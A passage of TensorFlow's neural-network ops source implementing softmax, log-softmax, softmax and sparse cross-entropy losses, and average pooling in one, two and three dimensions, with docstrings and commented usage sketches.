output.set_shape(output_shape)
return output
def _wrap_2d_function(inputs, compute_op, dim=-1, name=None):
"""Helper function for ops that accept and return 2d inputs of same shape.
It reshapes and transposes the inputs into a 2-D Tensor and then invokes
  the given function. The output is then transposed and reshaped back.
If the given function returns a tuple of tensors, each of them will be
transposed and reshaped.
Args:
inputs: A non-empty `Tensor`. Must be one of the following types: `half`,
`float32`, `float64`.
compute_op: The function to wrap. Must accept the input tensor as its first
      argument, and a second keyword argument `name`.
dim: The dimension softmax would be performed on. The default is -1 which
indicates the last dimension.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same shape as inputs. If compute_op returns multiple
tensors, each of them have the same shape as the input.
Raises:
InvalidArgumentError: if `inputs` is empty or `dim` is beyond the last
dimension of `inputs`.
"""
def _swap_axis(input_tensor, dim_index, last_index, name=None):
"""Swaps logits's dim_index and last_index."""
return array_ops.transpose(
input_tensor,
array_ops.concat([
math_ops.range(dim_index), [last_index],
math_ops.range(dim_index + 1, last_index), [dim_index]
], 0),
name=name)
inputs = ops.convert_to_tensor(inputs)
# We need its original shape for shape inference.
shape = inputs.get_shape()
is_last_dim = (dim == -1) or (dim == shape.ndims - 1)
if is_last_dim:
return compute_op(inputs, name=name)
dim_val = dim
if isinstance(dim, ops.Tensor):
dim_val = tensor_util.constant_value(dim)
if dim_val is not None and not -shape.ndims <= dim_val < shape.ndims:
raise errors_impl.InvalidArgumentError(
None, None,
"Dimension (%d) must be in the range [%d, %d) where %d is the number of"
" dimensions in the input." % (dim_val, -shape.ndims, shape.ndims,
shape.ndims))
# If dim is not the last dimension, we have to do a transpose so that we can
# still perform the op on its last dimension.
# In case dim is negative (and is not last dimension -1), add shape.ndims
ndims = array_ops.rank(inputs)
if not isinstance(dim, ops.Tensor):
if dim < 0:
dim += ndims
else:
dim = array_ops.where(math_ops.less(dim, 0), dim + ndims, dim)
# Swap logits' dimension of dim and its last dimension.
input_rank = array_ops.rank(inputs)
dim_axis = dim % shape.ndims
inputs = _swap_axis(inputs, dim_axis, math_ops.subtract(input_rank, 1))
# Do the actual call on its last dimension.
def fix_output(output):
output = _swap_axis(
output, dim_axis, math_ops.subtract(input_rank, 1), name=name)
# Make shape inference work since transpose may erase its static shape.
output.set_shape(shape)
return output
outputs = compute_op(inputs)
if isinstance(outputs, tuple):
return tuple(fix_output(output) for output in outputs)
else:
return fix_output(outputs)
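# Illustrative sketch (not part of the original module): when `dim` is not the
# last axis, _wrap_2d_function swaps that axis to the end, applies the op, and
# swaps it back. Assuming the public `tf` API, a softmax over axis 0 is
# therefore equivalent to transpose / row-wise softmax / transpose:
#
#   x = tf.random.normal([3, 5])
#   a = tf.nn.softmax(x, axis=0)
#   b = tf.transpose(tf.nn.softmax(tf.transpose(x), axis=-1))
#   # `a` and `b` agree up to floating point tolerance.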
@tf_export("nn.softmax", "math.softmax", v1=[])
@dispatch.add_dispatch_support
def softmax_v2(logits, axis=None, name=None):
"""Computes softmax activations.
Used for multi-class predictions. The sum of all outputs generated by softmax
is 1.
This function performs the equivalent of
softmax = tf.exp(logits) / tf.reduce_sum(tf.exp(logits), axis)
Example usage:
>>> softmax = tf.nn.softmax([-1, 0., 1.])
>>> softmax
<tf.Tensor: shape=(3,), dtype=float32,
numpy=array([0.09003057, 0.24472848, 0.66524094], dtype=float32)>
>>> sum(softmax)
<tf.Tensor: shape=(), dtype=float32, numpy=1.0>
Args:
logits: A non-empty `Tensor`. Must be one of the following types: `half`,
`float32`, `float64`.
axis: The dimension softmax would be performed on. The default is -1 which
indicates the last dimension.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type and shape as `logits`.
Raises:
InvalidArgumentError: if `logits` is empty or `axis` is beyond the last
dimension of `logits`.
"""
if axis is None:
axis = -1
return _wrap_2d_function(logits, gen_nn_ops.softmax, axis, name)
@tf_export(v1=["nn.softmax", "math.softmax"])
@dispatch.add_dispatch_support
@deprecation.deprecated_args(None, "dim is deprecated, use axis instead", "dim")
def softmax(logits, axis=None, name=None, dim=None):
axis = deprecation.deprecated_argument_lookup("axis", axis, "dim", dim)
if axis is None:
axis = -1
return _wrap_2d_function(logits, gen_nn_ops.softmax, axis, name)
softmax.__doc__ = softmax_v2.__doc__
@tf_export(v1=["nn.log_softmax", "math.log_softmax"])
@dispatch.add_dispatch_support
@deprecation.deprecated_args(None, "dim is deprecated, use axis instead", "dim")
def log_softmax(logits, axis=None, name=None, dim=None):
"""Computes log softmax activations.
For each batch `i` and class `j` we have
logsoftmax = logits - log(reduce_sum(exp(logits), axis))
Args:
logits: A non-empty `Tensor`. Must be one of the following types: `half`,
`float32`, `float64`.
axis: The dimension softmax would be performed on. The default is -1 which
indicates the last dimension.
name: A name for the operation (optional).
dim: Deprecated alias for `axis`.
Returns:
A `Tensor`. Has the same type as `logits`. Same shape as `logits`.
Raises:
InvalidArgumentError: if `logits` is empty or `axis` is beyond the last
dimension of `logits`.
"""
axis = deprecation.deprecated_argument_lookup("axis", axis, "dim", dim)
if axis is None:
axis = -1
return _wrap_2d_function(logits, gen_nn_ops.log_softmax, axis, name)
@tf_export("nn.log_softmax", "math.log_softmax", v1=[])
@dispatch.add_dispatch_support
def log_softmax_v2(logits, axis=None, name=None):
"""Computes log softmax activations.
For each batch `i` and class `j` we have
logsoftmax = logits - log(reduce_sum(exp(logits), axis))
Args:
logits: A non-empty `Tensor`. Must be one of the following types: `half`,
`float32`, `float64`.
axis: The dimension softmax would be performed on. The default is -1 which
indicates the last dimension.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `logits`. Same shape as `logits`.
Raises:
InvalidArgumentError: if `logits` is empty or `axis` is beyond the last
dimension of `logits`.
"""
if axis is None:
axis = -1
return _wrap_2d_function(logits, gen_nn_ops.log_softmax, axis, name)
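# Illustrative sketch (not part of the original module): log_softmax matches
# its definition `logits - log(reduce_sum(exp(logits), axis))` up to floating
# point error. Assuming the public `tf` API:
#
#   logits = tf.constant([[2.0, 1.0, 0.1]])
#   manual = logits - tf.math.log(
#       tf.reduce_sum(tf.exp(logits), axis=-1, keepdims=True))
#   # tf.nn.log_softmax(logits) and `manual` should be numerically close.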
def _ensure_xent_args(name, sentinel, labels, logits):
# Make sure that all arguments were passed as named arguments.
if sentinel is not None:
raise ValueError("Only call `%s` with "
"named arguments (labels=..., logits=..., ...)" % name)
if labels is None or logits is None:
raise ValueError("Both labels and logits must be provided.")
@tf_export("nn.softmax_cross_entropy_with_logits", v1=[])
@dispatch.add_dispatch_support
def softmax_cross_entropy_with_logits_v2(labels, logits, axis=-1, name=None):
"""Computes softmax cross entropy between `logits` and `labels`.
Measures the probability error in discrete classification tasks in which the
classes are mutually exclusive (each entry is in exactly one class). For
example, each CIFAR-10 image is labeled with one and only one label: an image
can be a dog or a truck, but not both.
**NOTE:** While the classes are mutually exclusive, their probabilities
need not be. All that is required is that each row of `labels` is
a valid probability distribution. If they are not, the computation of the
gradient will be incorrect.
If using exclusive `labels` (wherein one and only
one class is true at a time), see `sparse_softmax_cross_entropy_with_logits`.
Usage:
>>> logits = [[4.0, 2.0, 1.0], [0.0, 5.0, 1.0]]
>>> labels = [[1.0, 0.0, 0.0], [0.0, 0.8, 0.2]]
>>> tf.nn.softmax_cross_entropy_with_logits(labels=labels, logits=logits)
<tf.Tensor: shape=(2,), dtype=float32,
numpy=array([0.16984604, 0.82474494], dtype=float32)>
**WARNING:** This op expects unscaled logits, since it performs a `softmax`
on `logits` internally for efficiency. Do not call this op with the
output of `softmax`, as it will produce incorrect results.
A common use case is to have logits and labels of shape
`[batch_size, num_classes]`, but higher dimensions are supported, with
the `axis` argument specifying the class dimension.
`logits` and `labels` must have the same dtype (either `float16`, `float32`,
or `float64`).
Backpropagation will happen into both `logits` and `labels`. To disallow
backpropagation into `labels`, pass label tensors through `tf.stop_gradient`
before feeding it to this function.
**Note that to avoid confusion, it is required to pass only named arguments to
this function.**
Args:
labels: Each vector along the class dimension should hold a valid
probability distribution e.g. for the case in which labels are of shape
`[batch_size, num_classes]`, each row `labels[i]` must be a valid
probability distribution.
logits: Per-label activations, typically a linear output. These activation
energies are interpreted as unnormalized log probabilities.
axis: The class dimension. Defaulted to -1 which is the last dimension.
name: A name for the operation (optional).
Returns:
A `Tensor` that contains the softmax cross entropy loss. Its type is the
same as `logits` and its shape is the same as `labels` except that it does
not have the last dimension of `labels`.
"""
return softmax_cross_entropy_with_logits_v2_helper(
labels=labels, logits=logits, axis=axis, name=name)
@tf_export(v1=["nn.softmax_cross_entropy_with_logits_v2"])
@dispatch.add_dispatch_support
@deprecated_args(None, "dim is deprecated, use axis instead", "dim")
def softmax_cross_entropy_with_logits_v2_helper(
labels, logits, axis=None, name=None, dim=None):
"""Computes softmax cross entropy between `logits` and `labels`.
Measures the probability error in discrete classification tasks in which the
classes are mutually exclusive (each entry is in exactly one class). For
example, each CIFAR-10 image is labeled with one and only one label: an image
can be a dog or a truck, but not both.
**NOTE:** While the classes are mutually exclusive, their probabilities
need not be. All that is required is that each row of `labels` is
a valid probability distribution. If they are not, the computation of the
gradient will be incorrect.
If using exclusive `labels` (wherein one and only
one class is true at a time), see `sparse_softmax_cross_entropy_with_logits`.
**WARNING:** This op expects unscaled logits, since it performs a `softmax`
on `logits` internally for efficiency. Do not call this op with the
output of `softmax`, as it will produce incorrect results.
A common use case is to have logits and labels of shape
`[batch_size, num_classes]`, but higher dimensions are supported, with
the `axis` argument specifying the class dimension.
`logits` and `labels` must have the same dtype (either `float16`, `float32`,
or `float64`).
Backpropagation will happen into both `logits` and `labels`. To disallow
backpropagation into `labels`, pass label tensors through `tf.stop_gradient`
before feeding it to this function.
**Note that to avoid confusion, it is required to pass only named arguments to
this function.**
Args:
labels: Each vector along the class dimension should hold a valid
probability distribution e.g. for the case in which labels are of shape
`[batch_size, num_classes]`, each row `labels[i]` must be a valid
probability distribution.
logits: Unscaled log probabilities.
axis: The class dimension. Defaulted to -1 which is the last dimension.
name: A name for the operation (optional).
dim: Deprecated alias for axis.
Returns:
A `Tensor` that contains the softmax cross entropy loss. Its type is the
same as `logits` and its shape is the same as `labels` except that it does
not have the last dimension of `labels`.
"""
# TODO(pcmurray) Raise an error when the labels do not sum to 1. Note: This
# could break users who call this with bad labels, but disregard the bad
# results.
axis = deprecated_argument_lookup("axis", axis, "dim", dim)
del dim
if axis is None:
axis = -1
with ops.name_scope(name, "softmax_cross_entropy_with_logits",
[logits, labels]) as name:
logits = ops.convert_to_tensor(logits, name="logits")
labels = ops.convert_to_tensor(labels, name="labels")
convert_to_float32 = (
logits.dtype == dtypes.float16 or logits.dtype == dtypes.bfloat16)
precise_logits = math_ops.cast(
logits, dtypes.float32) if convert_to_float32 else logits
# labels and logits must be of the same type
labels = math_ops.cast(labels, precise_logits.dtype)
input_rank = array_ops.rank(precise_logits)
# For shape inference.
shape = logits.get_shape()
# Move the dim to the end if dim is not the last dimension.
if axis != -1:
def _move_dim_to_end(tensor, dim_index, rank):
return array_ops.transpose(
tensor,
array_ops.concat([
math_ops.range(dim_index),
math_ops.range(dim_index + 1, rank), [dim_index]
], 0))
precise_logits = _move_dim_to_end(precise_logits, axis, input_rank)
labels = _move_dim_to_end(labels, axis, input_rank)
input_shape = array_ops.shape(precise_logits)
# Make precise_logits and labels into matrices.
precise_logits = _flatten_outer_dims(precise_logits)
labels = _flatten_outer_dims(labels)
# Do the actual op computation.
if _tf_deterministic_ops():
log_probs = log_softmax_v2(precise_logits)
cost = -math_ops.reduce_sum(labels * log_probs, axis=1)
else:
# The second output tensor contains the gradients. We use it in
# CrossEntropyGrad() in nn_grad but not here.
cost, unused_backprop = gen_nn_ops.softmax_cross_entropy_with_logits(
precise_logits, labels, name=name)
# The output cost shape should be the input minus axis.
output_shape = array_ops.slice(input_shape, [0],
[math_ops.subtract(input_rank, 1)])
cost = array_ops.reshape(cost, output_shape)
# Make shape inference work since reshape and transpose may erase its static
# shape.
if not context.executing_eagerly(
) and shape is not None and shape.dims is not None:
shape = shape.as_list()
del shape[axis]
cost.set_shape(shape)
if convert_to_float32:
return math_ops.cast(cost, logits.dtype)
else:
return cost
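# Illustrative sketch (not part of the original module): the deterministic
# branch above computes the loss as `-sum(labels * log_softmax(logits))` over
# the class axis, which also makes a convenient sanity check for the fused op.
# Assuming the public `tf` API:
#
#   logits = tf.constant([[4.0, 2.0, 1.0], [0.0, 5.0, 1.0]])
#   labels = tf.constant([[1.0, 0.0, 0.0], [0.0, 0.8, 0.2]])
#   manual = -tf.reduce_sum(labels * tf.nn.log_softmax(logits), axis=-1)
#   # tf.nn.softmax_cross_entropy_with_logits(labels=labels, logits=logits)
#   # should agree with `manual` up to floating point tolerance.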
_XENT_DEPRECATION = """
Future major versions of TensorFlow will allow gradients to flow
into the labels input on backprop by default.
See `tf.nn.softmax_cross_entropy_with_logits_v2`.
"""
@tf_export(v1=["nn.softmax_cross_entropy_with_logits"])
@dispatch.add_dispatch_support
@deprecation.deprecated(date=None, instructions=_XENT_DEPRECATION)
def softmax_cross_entropy_with_logits(
_sentinel=None, # pylint: disable=invalid-name
labels=None,
logits=None,
dim=-1,
name=None,
axis=None):
"""Computes softmax cross entropy between `logits` and `labels`.
Measures the probability error in discrete classification tasks in which the
classes are mutually exclusive (each entry is in exactly one class). For
example, each CIFAR-10 image is labeled with one and only one label: an image
can be a dog or a truck, but not both.
**NOTE:** While the classes are mutually exclusive, their probabilities
need not be. All that is required is that each row of `labels` is
a valid probability distribution. If they are not, the computation of the
gradient will be incorrect.
If using exclusive `labels` (wherein one and only
one class is true at a time), see `sparse_softmax_cross_entropy_with_logits`.
**WARNING:** This op expects unscaled logits, since it performs a `softmax`
on `logits` internally for efficiency. Do not call this op with the
output of `softmax`, as it will produce incorrect results.
A common use case is to have logits and labels of shape
`[batch_size, num_classes]`, but higher dimensions are supported, with
the `dim` argument specifying the class dimension.
Backpropagation will happen only into `logits`. To calculate a cross entropy
loss that allows backpropagation into both `logits` and `labels`, see
`tf.nn.softmax_cross_entropy_with_logits_v2`.
**Note that to avoid confusion, it is required to pass only named arguments to
this function.**
Args:
_sentinel: Used to prevent positional parameters. Internal, do not use.
labels: Each vector along the class dimension should hold a valid
probability distribution e.g. for the case in which labels are of shape
`[batch_size, num_classes]`, each row `labels[i]` must be a valid
probability distribution.
logits: Per-label activations, typically a linear output. These activation
energies are interpreted as unnormalized log probabilities.
dim: The class dimension. Defaulted to -1 which is the last dimension.
name: A name for the operation (optional).
axis: Alias for dim.
Returns:
A `Tensor` that contains the softmax cross entropy loss. Its type is the
same as `logits` and its shape is the same as `labels` except that it does
not have the last dimension of `labels`.
"""
dim = deprecated_argument_lookup("axis", axis, "dim", dim)
_ensure_xent_args("softmax_cross_entropy_with_logits", _sentinel, labels,
logits)
with ops.name_scope(name, "softmax_cross_entropy_with_logits_sg",
[logits, labels]) as name:
labels = array_ops.stop_gradient(labels, name="labels_stop_gradient")
return softmax_cross_entropy_with_logits_v2(
labels=labels, logits=logits, axis=dim, name=name)
@tf_export(v1=["nn.sparse_softmax_cross_entropy_with_logits"])
@dispatch.add_dispatch_support
def sparse_softmax_cross_entropy_with_logits(
_sentinel=None, # pylint: disable=invalid-name
labels=None,
logits=None,
name=None):
"""Computes sparse softmax cross entropy between `logits` and `labels`.
Measures the probability error in discrete classification tasks in which the
classes are mutually exclusive (each entry is in exactly one class). For
example, each CIFAR-10 image is labeled with one and only one label: an image
can be a dog or a truck, but not both.
**NOTE:** For this operation, the probability of a given label is considered
exclusive. That is, soft classes are not allowed, and the `labels` vector
must provide a single specific index for the true class for each row of
`logits` (each minibatch entry). For soft softmax classification with
a probability distribution for each entry, see
`softmax_cross_entropy_with_logits_v2`.
**WARNING:** This op expects unscaled logits, since it performs a `softmax`
on `logits` internally for efficiency. Do not call this op with the
output of `softmax`, as it will produce incorrect results.
A common use case is to have logits of shape
`[batch_size, num_classes]` and have labels of shape
`[batch_size]`, but higher dimensions are supported, in which
case the last dimension is assumed to be of size `num_classes`.
`logits` must have the dtype of `float16`, `float32`, or `float64`, and
`labels` must have the dtype of `int32` or `int64`.
**Note that to avoid confusion, it is required to pass only named arguments to
this function.**
Args:
_sentinel: Used to prevent positional parameters. Internal, do not use.
labels: `Tensor` of shape `[d_0, d_1, ..., d_{r-1}]` (where `r` is rank of
`labels` and result) and dtype `int32` or `int64`. Each entry in `labels`
must be an index in `[0, num_classes)`. Other values will raise an
exception when this op is run on CPU, and return `NaN` for corresponding
loss and gradient rows on GPU.
logits: Per-label activations (typically a linear output) of shape
`[d_0, d_1, ..., d_{r-1}, num_classes]` and dtype `float16`, `float32`, or
`float64`. These activation energies are interpreted as unnormalized log
probabilities.
name: A name for the operation (optional).
Returns:
A `Tensor` of the same shape as `labels` and of the same type as `logits`
with the softmax cross entropy loss.
Raises:
ValueError: If logits are scalars (need to have rank >= 1) or if the rank
of the labels is not equal to the rank of the logits minus one.
"""
_ensure_xent_args("sparse_softmax_cross_entropy_with_logits", _sentinel,
labels, logits)
# TODO(pcmurray) Raise an error when the label is not an index in
# [0, num_classes). Note: This could break users who call this with bad
# labels, but disregard the bad results.
# Reshape logits and labels to rank 2.
with ops.name_scope(name, "SparseSoftmaxCrossEntropyWithLogits",
[labels, logits]):
labels = ops.convert_to_tensor(labels)
logits = ops.convert_to_tensor(logits)
precise_logits = math_ops.cast(logits, dtypes.float32) if (dtypes.as_dtype(
logits.dtype) == dtypes.float16) else logits
# Store label shape for result later.
labels_static_shape = labels.get_shape()
labels_shape = array_ops.shape(labels)
static_shapes_fully_defined = (
labels_static_shape.is_fully_defined() and
logits.get_shape()[:-1].is_fully_defined())
if logits.get_shape().ndims is not None and logits.get_shape().ndims == 0:
raise ValueError(
"Logits cannot be scalars - received shape %s." % logits.get_shape())
if logits.get_shape().ndims is not None and (
labels_static_shape.ndims is not None and
labels_static_shape.ndims != logits.get_shape().ndims - 1):
raise ValueError("Rank mismatch: Rank of labels (received %s) should "
"equal rank of logits minus 1 (received %s)." %
(labels_static_shape.ndims, logits.get_shape().ndims))
if (static_shapes_fully_defined and
labels_static_shape != logits.get_shape()[:-1]):
raise ValueError("Shape mismatch: The shape of labels (received %s) "
"should equal the shape of logits except for the last "
"dimension (received %s)." % (labels_static_shape,
logits.get_shape()))
# Check if no reshapes are required.
if logits.get_shape().ndims == 2:
cost, _ = gen_nn_ops.sparse_softmax_cross_entropy_with_logits(
precise_logits, labels, name=name)
if logits.dtype == dtypes.float16:
return math_ops.cast(cost, dtypes.float16)
else:
return cost
# Perform a check of the dynamic shapes if the static shapes are not fully
# defined.
shape_checks = []
if not static_shapes_fully_defined:
shape_checks.append(
check_ops.assert_equal(
array_ops.shape(labels),
array_ops.shape(logits)[:-1]))
with ops.control_dependencies(shape_checks):
# Reshape logits to 2 dim, labels to 1 dim.
num_classes = array_ops.shape(logits)[array_ops.rank(logits) - 1]
precise_logits = array_ops.reshape(precise_logits, [-1, num_classes])
labels = array_ops.reshape(labels, [-1])
# The second output tensor contains the gradients. We use it in
# _CrossEntropyGrad() in nn_grad but not here.
cost, _ = gen_nn_ops.sparse_softmax_cross_entropy_with_logits(
precise_logits, labels, name=name)
cost = array_ops.reshape(cost, labels_shape)
cost.set_shape(labels_static_shape)
if logits.dtype == dtypes.float16:
return math_ops.cast(cost, dtypes.float16)
else:
return cost
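# Illustrative sketch (not part of the original module): the sparse op with
# integer class indices matches the dense op applied to one-hot labels.
# Assuming the public `tf` API:
#
#   logits = tf.constant([[2.0, -5.0, 0.5, -0.1], [0.0, 0.0, 1.9, 1.4]])
#   labels = tf.constant([0, 3])
#   sparse = tf.nn.sparse_softmax_cross_entropy_with_logits(
#       labels=labels, logits=logits)
#   dense = tf.nn.softmax_cross_entropy_with_logits(
#       labels=tf.one_hot(labels, depth=4), logits=logits)
#   # `sparse` and `dense` should be numerically close.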
@tf_export("nn.sparse_softmax_cross_entropy_with_logits", v1=[])
@dispatch.add_dispatch_support
def sparse_softmax_cross_entropy_with_logits_v2(labels, logits, name=None):
"""Computes sparse softmax cross entropy between `logits` and `labels`.
Measures the probability error in discrete classification tasks in which the
classes are mutually exclusive (each entry is in exactly one class). For
example, each CIFAR-10 image is labeled with one and only one label: an image
can be a dog or a truck, but not both.
Note: For this operation, the probability of a given label is considered
exclusive. That is, soft classes are not allowed, and the `labels` vector
must provide a single specific index for the true class for each row of
`logits` (each minibatch entry). For soft softmax classification with
a probability distribution for each entry, see
`softmax_cross_entropy_with_logits_v2`.
Warning: This op expects unscaled logits, since it performs a `softmax`
on `logits` internally for efficiency. Do not call this op with the
output of `softmax`, as it will produce incorrect results.
A common use case is to have logits of shape
`[batch_size, num_classes]` and have labels of shape
`[batch_size]`, but higher dimensions are supported, in which
case the last dimension is assumed to be of size `num_classes`.
`logits` must have the dtype of `float16`, `float32`, or `float64`, and
`labels` must have the dtype of `int32` or `int64`.
>>> logits = tf.constant([[2., -5., .5, -.1],
... [0., 0., 1.9, 1.4],
... [-100., 100., -100., -100.]])
>>> labels = tf.constant([0, 3, 1])
>>> tf.nn.sparse_softmax_cross_entropy_with_logits(
... labels=labels, logits=logits).numpy()
array([0.29750752, 1.1448325 , 0. ], dtype=float32)
To avoid confusion, passing only named arguments to this function is
recommended.
Args:
labels: `Tensor` of shape `[d_0, d_1, ..., d_{r-1}]` (where `r` is rank of
`labels` and result) and dtype `int32` or `int64`. Each entry in `labels`
must be an index in `[0, num_classes)`. Other values will raise an
exception when this op is run on CPU, and return `NaN` for corresponding
loss and gradient rows on GPU.
logits: Unscaled log probabilities of shape `[d_0, d_1, ..., d_{r-1},
num_classes]` and dtype `float16`, `float32`, or `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor` of the same shape as `labels` and of the same type as `logits`
with the softmax cross entropy loss.
Raises:
ValueError: If logits are scalars (need to have rank >= 1) or if the rank
of the labels is not equal to the rank of the logits minus one.
"""
return sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits, name=name)
@tf_export("nn.avg_pool", v1=["nn.avg_pool_v2"])
@dispatch.add_dispatch_support
def avg_pool_v2(input, ksize, strides, padding, data_format=None, name=None): # pylint: disable=redefined-builtin
"""Performs the avg pooling on the input.
Each entry in `output` is the mean of the corresponding size `ksize`
window in `input`.
Args:
input: Tensor of rank N+2, of shape `[batch_size] + input_spatial_shape +
[num_channels]` if `data_format` does not start with "NC" (default), or
`[batch_size, num_channels] + input_spatial_shape` if data_format starts
with "NC". Pooling happens over the spatial dimensions only.
ksize: An int or list of `ints` that has length `1`, `N` or `N+2`. The size
of the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `N` or `N+2`. The
stride of the sliding window for each dimension of the input tensor.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm. See
the "returns" section of `tf.nn.convolution` for details.
data_format: A string. Specifies the channel dimension. For N=1 it can be
either "NWC" (default) or "NCW", for N=2 it can be either "NHWC" (default)
or "NCHW" and for N=3 either "NDHWC" (default) or "NCDHW".
name: Optional name for the operation.
Returns:
A `Tensor` of format specified by `data_format`.
The average pooled output tensor.
"""
if input.shape is not None:
n = len(input.shape) - 2
elif data_format is not None:
n = len(data_format) - 2
else:
raise ValueError(
"The input must have a rank or a data format must be given.")
if not 1 <= n <= 3:
raise ValueError(
"Input tensor must be of rank 3, 4 or 5 but was {}.".format(n + 2))
if data_format is None:
channel_index = n + 1
else:
channel_index = 1 if data_format.startswith("NC") else n + 1
ksize = _get_sequence(ksize, n, channel_index, "ksize")
strides = _get_sequence(strides, n, channel_index, "strides")
avg_pooling_ops = {
1: avg_pool1d,
2: gen_nn_ops.avg_pool,
3: gen_nn_ops.avg_pool3d
}
op = avg_pooling_ops[n]
return op(
input,
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format,
name=name)
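# Illustrative sketch (not part of the original module): avg_pool_v2 picks the
# 1-D, 2-D or 3-D kernel from the spatial rank of the input. Assuming the
# public `tf` API:
#
#   x = tf.reshape(tf.range(16, dtype=tf.float32), [1, 4, 4, 1])
#   y = tf.nn.avg_pool(x, ksize=2, strides=2, padding="VALID")
#   # y has shape [1, 2, 2, 1]; each entry is the mean of a 2x2 window.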
@tf_export(v1=["nn.avg_pool", "nn.avg_pool2d"])
@dispatch.add_dispatch_support
def avg_pool(value, ksize, strides, padding, data_format="NHWC",
name=None, input=None): # pylint: disable=redefined-builtin
"""Performs the average pooling on the input.
Each entry in `output` is the mean of the corresponding size `ksize`
window in `value`.
Args:
value: A 4-D `Tensor` of shape `[batch, height, width, channels]` and type
`float32`, `float64`, `qint8`, `quint8`, or `qint32`.
ksize: An int or list of `ints` that has length `1`, `2` or `4`. The size of
the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `2` or `4`. The
stride of the sliding window for each dimension of the input tensor.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
See the "returns" section of `tf.nn.convolution` for details.
data_format: A string. 'NHWC' and 'NCHW' are supported.
name: Optional name for the operation.
input: Alias for value.
Returns:
A `Tensor` with the same type as `value`. The average pooled output tensor.
"""
with ops.name_scope(name, "AvgPool", [value]) as name:
value = deprecation.deprecated_argument_lookup(
"input", input, "value", value)
if data_format is None:
data_format = "NHWC"
channel_index = 1 if data_format.startswith("NC") else 3
ksize = _get_sequence(ksize, 2, channel_index, "ksize")
strides = _get_sequence(strides, 2, channel_index, "strides")
return gen_nn_ops.avg_pool(
value,
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format,
name=name)
@tf_export("nn.avg_pool2d", v1=[])
@dispatch.add_dispatch_support
def avg_pool2d(input, ksize, strides, padding, data_format="NHWC", name=None): # pylint: disable=redefined-builtin
"""Performs the average pooling on the input.
Each entry in `output` is the mean of the corresponding size `ksize`
window in `input`.
Args:
input: A 4-D `Tensor` of shape `[batch, height, width, channels]` and type
`float32`, `float64`, `qint8`, `quint8`, or `qint32`.
ksize: An int or list of `ints` that has length `1`, `2` or `4`. The size of
the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `2` or `4`. The
stride of the sliding window for each dimension of the input tensor.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
See the "returns" section of `tf.nn.convolution` for details.
data_format: A string. 'NHWC' and 'NCHW' are supported.
name: Optional name for the operation.
Returns:
A `Tensor` with the same type as `input`. The average pooled output tensor.
"""
with ops.name_scope(name, "AvgPool2D", [input]) as name:
if data_format is None:
data_format = "NHWC"
channel_index = 1 if data_format.startswith("NC") else 3
ksize = _get_sequence(ksize, 2, channel_index, "ksize")
strides = _get_sequence(strides, 2, channel_index, "strides")
return gen_nn_ops.avg_pool(
input,
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format,
name=name)
@tf_export("nn.avg_pool1d")
@dispatch.add_dispatch_support
def avg_pool1d(input, ksize, strides, padding, data_format="NWC", name=None): # pylint: disable=redefined-builtin
"""Performs the average pooling on the input.
Each entry in `output` is the mean of the corresponding size `ksize`
window in `input`.
Note that internally this op reshapes the input and uses the underlying 2-D
operation.
Args:
input: A 3-D `Tensor` of the format specified by `data_format`.
ksize: An int or list of `ints` that has length `1` or `3`. The size of the
window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1` or `3`. The stride of
the sliding window for each dimension of the input tensor.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm. See
the "returns" section of `tf.nn.convolution` for details.
data_format: An optional string from: "NWC", "NCW". Defaults to "NWC".
name: A name for the operation (optional).
Returns:
A `Tensor` of format specified by `data_format`.
The average pooled output tensor.
"""
with ops.name_scope(name, "AvgPool1D", [input]) as name:
if data_format is None:
data_format = "NWC"
channel_index = 1 if data_format.startswith("NC") else 2
ksize = [1] + _get_sequence(ksize, 1, channel_index, "ksize")
strides = [1] + _get_sequence(strides, 1, channel_index, "strides")
expanding_dim = 1 if data_format == "NWC" else 2
data_format = "NHWC" if data_format == "NWC" else "NCHW"
input = array_ops.expand_dims_v2(input, expanding_dim)
result = gen_nn_ops.avg_pool(
input,
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format,
name=name)
return array_ops.squeeze(result, expanding_dim)
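# Illustrative sketch (not part of the original module): the 1-D pooling above
# inserts a height dimension of size 1, calls the 2-D kernel, and squeezes the
# extra dimension back out. Assuming the public `tf` API:
#
#   x = tf.constant([[[1.0], [2.0], [3.0], [4.0]]])  # shape [1, 4, 1], "NWC"
#   y = tf.nn.avg_pool1d(x, ksize=2, strides=2, padding="VALID")
#   # y has shape [1, 2, 1]; the pooled values are 1.5 and 3.5.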
@tf_export("nn.avg_pool3d")
@dispatch.add_dispatch_support
def avg_pool3d(input, ksize, strides, padding, data_format="NDHWC", name=None): # pylint: disable=redefined-builtin
"""Performs the average pooling on the input.
Each entry in `output` is the mean of the corresponding size `ksize`
window in `input`.
Args:
input: A 5-D `Tensor` of shape `[batch, depth, height, width, channels]` and type
`float32`, `float64`, `qint8`, `quint8`, or `qint32`.
ksize: An int or list of `ints` that has length `1`, `3` or `5`. The size of
the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `3` or `5`. The
stride of the sliding window for each dimension of the input tensor.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
See the "returns" section of `tf.nn.convolution` for details.
data_format: A string. 'NDHWC' and 'NCDHW' are supported.
name: Optional name for the operation.
Returns:
A `Tensor` with the same type as `input`. The average pooled output tensor.
"""
with ops.name_scope(name, "AvgPool3D", [input]) as name:
if data_format is None:
data_format = "NDHWC"
channel_index = 1 if data_format.startswith("NC") else 3
ksize = _get_sequence(ksize, 3, channel_index, "ksize")
strides = _get_sequence(strides, 3, channel_index, "strides")
return gen_nn_ops.avg_pool3d(
input,
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format,
name=name)
# pylint: disable=redefined-builtin
@tf_export("nn.max_pool", v1=["nn.max_pool_v2"])
